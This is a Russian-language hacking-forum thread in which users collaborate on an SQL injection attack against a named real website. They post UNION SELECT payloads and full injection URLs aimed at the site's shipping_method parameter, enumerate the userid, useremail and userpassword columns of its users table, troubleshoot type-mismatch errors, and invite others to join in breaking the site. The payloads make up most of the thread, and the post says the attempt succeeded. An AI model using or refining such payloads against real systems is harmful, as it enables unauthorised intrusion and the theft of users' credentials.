ANTICHAT — форум по информационной безопасности, OSINT и технологиям

может попробовать двойной юнион ?
-1+UNION+SELECT+null,userid,null,null,null,null,nul l,null+from+public.users
+union+select+null,0 as cur.jrk,null,null,null,null,nul l,null

тогда в конце припишется " ORDER BY cur.jrk ASC "

имхо может прокатить

точка ему тут не нравится cur.jrk, и так %2E не катит
ERROR: syntax error at or near "." at character 145

прои такой строчке:
http://хххххх.уу/index.da?ln=est&do=my_cart&shipping_method=-10+union+select+null,userid+from+public.users+wher e+userid=2031
выводит 2031, но других полей кроме userid просто не могу подобрать, выводит : column XXx is not exist
pass, passwrd, pswrd, psswrd, password, drowssap i t.d. нот экзист и всё тут =(

В том, то и прикол что вывод идёт числового поля... И кроме как числовые данные ты с Union туда засунуть не сможешь...

вот сам сайт http://datagate.ee кому интересно, можете поломать, вместе оно быстрее будет

так, удалось выявить существование таких полей в таблице users:
1 userid
2 useremail
3 userpassword
однако тайп мисматч не даёт туда ворваться, числовые параметры требует =(

странно такое написание система допускает:
http://datagate.ee/index.da?ln=est&do=my_cart&shipping_method=-11+union+select+null,userid+from+public.users+wher e+userid=2036
возвращает значение 2036

а такое нет
http://datagate.ee/index.da?ln=est&do=my_cart&shipping_method=-11+union+select+null,userpassword+from+public.user s+where+userpassword=987654321
Почему?

всё, проблема решена всем спасибо. Можно закрывать тему